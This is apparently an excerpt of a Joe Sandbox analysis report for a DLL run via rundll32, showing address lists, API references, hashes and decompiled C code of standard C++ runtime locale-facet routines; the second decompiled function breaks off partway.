0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b

APIs

__EH_prolog3.LIBCMT ref: 6E20F614
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F61E
int.LIBCPMT ref: 6E20F635

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F658
std::_Facet_Register.LIBCPMT ref: 6E20F66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F6AD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
Instruction ID: 9f029279f3dec20ff8cca31f8de851de466ce8a13851c521c966489a781f5d2a
Opcode Fuzzy Hash: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
Instruction Fuzzy Hash: 24110675D0051E8FCF04DBE0C894AEEB77BAF44B18F240918E420AB2D0DB749A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E21B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E21BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E21BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E21C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E21C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E21C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E21C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E21C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6e21b74c
0x6e21b74c
0x6e21b753
0x6e21b75d
0x6e21b762
0x6e21b76d
0x6e21b771
0x6e21b774
0x6e21b779
0x6e21b77d
0x6e21b782
0x6e21b786
0x6e21b7cb
0x6e21b7ce
0x6e21b7da
0x6e21b788
0x6e21b78a
0x6e21b790
0x6e21b796
0x6e21b79e
0x6e21b7a1
0x6e21b7de
0x6e21b7ec
0x6e21b7f1
0x6e21b7f9
0x6e21b803
0x6e21b808
0x6e21b813
0x6e21b817
0x6e21b81a
0x6e21b81f
0x6e21b828
0x6e21b82a
0x6e21b82c
0x6e21b871
0x6e21b874
0x6e21b880
0x6e21b82e
0x6e21b82e
0x6e21b830
0x6e21b836
0x6e21b83c
0x6e21b844
0x6e21b847
0x6e21b884
0x6e21b892
0x6e21b897
0x6e21b89f
0x6e21b8a9
0x6e21b8ae
0x6e21b8b9
0x6e21b8bd
0x6e21b8c0
0x6e21b8c5
0x6e21b8ce
0x6e21b8d0
0x6e21b8d2
0x6e21b917
0x6e21b91a
0x6e21b926
0x6e21b8d4
0x6e21b8d4
0x6e21b8d6
0x6e21b8dc
0x6e21b8e2
0x6e21b8ea
0x6e21b8ed
0x6e21b92a
0x6e21b938
0x6e21b93d
0x6e21b945
0x6e21b94f
0x6e21b954
0x6e21b95f
0x6e21b963
0x6e21b966
0x6e21b96b
0x6e21b974
0x6e21b976
0x6e21b978
0x6e21b9bd
0x6e21b9c0
0x6e21b9cc
0x6e21b97a
0x6e21b97a
0x6e21b97c
0x6e21b982
0x6e21b988
0x6e21b990
0x6e21b993
0x6e21b9d0
0x6e21b9de
0x6e21b9e3
0x6e21b9eb
0x6e21b9f5
0x6e21b9fa
0x6e21ba05
0x6e21ba09
0x6e21ba0c
0x6e21ba11
0x6e21ba1a
0x6e21ba1c
0x6e21ba1e
0x6e21ba63
0x6e21ba66
0x6e21ba72
0x6e21ba20
0x6e21ba20
0x6e21ba22
0x6e21ba28
0x6e21ba2e
0x6e21ba36
0x6e21ba39
0x6e21ba76
0x6e21ba84
0x6e21ba89
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21bac0
0x6e21bac2
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8
0x6e21ba3b
0x6e21ba3b
0x6e21ba3e
0x6e21ba42
0x6e21ba46
0x6e21ba53
0x6e21ba5b
0x6e21ba5d
0x00000000
0x6e21ba5d
0x6e21ba24
0x6e21ba24
0x00000000
0x6e21ba24
0x6e21ba22
0x6e21b995
0x6e21b995
0x6e21b998
0x6e21b99c
0x6e21b9a0
0x6e21b9ad
0x6e21b9b5
0x6e21b9b7
0x00000000
0x6e21b9b7
0x6e21b97e
0x6e21b97e
0x00000000
0x6e21b97e
0x6e21b97c
0x6e21b8ef
0x6e21b8ef
0x6e21b8f2
0x6e21b8f6
0x6e21b8fa
0x6e21b907
0x6e21b90f
0x6e21b911
0x00000000
0x6e21b911
0x6e21b8d8
0x6e21b8d8
0x00000000
0x6e21b8d8
0x6e21b8d6
0x6e21b849
0x6e21b849
0x6e21b84c
0x6e21b850
0x6e21b854
0x6e21b861
0x6e21b869
0x6e21b86b
0x00000000
0x6e21b86b
0x6e21b832
0x6e21b832
0x00000000
0x6e21b832
0x6e21b830
0x6e21b7a3
0x6e21b7a3
0x6e21b7a6
0x6e21b7aa
0x6e21b7ae
0x6e21b7bb
0x6e21b7c3
0x6e21b7c5
0x00000000
0x6e21b7c5
0x6e21b78c
0x6e21b78c
0x00000000
0x6e21b78c
0x6e21b78a

APIs

__EH_prolog3.LIBCMT ref: 6E21B753
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B75D
int.LIBCPMT ref: 6E21B774

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E21B797
std::_Facet_Register.LIBCPMT ref: 6E21B7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B7EC

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
Instruction ID: 7624d2fd8d0dbc0651cbef8b4529f7c1278a29cac0ae02a43c025bbc50aa34c0
Opcode Fuzzy Hash: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
Instruction Fuzzy Hash: 8311E77A91461ECBCF00DBE0C894EFDB7BBAF44B14F140909E510AB390DBB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E21B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E21BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E21C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E21C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E21C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E21C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E21C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
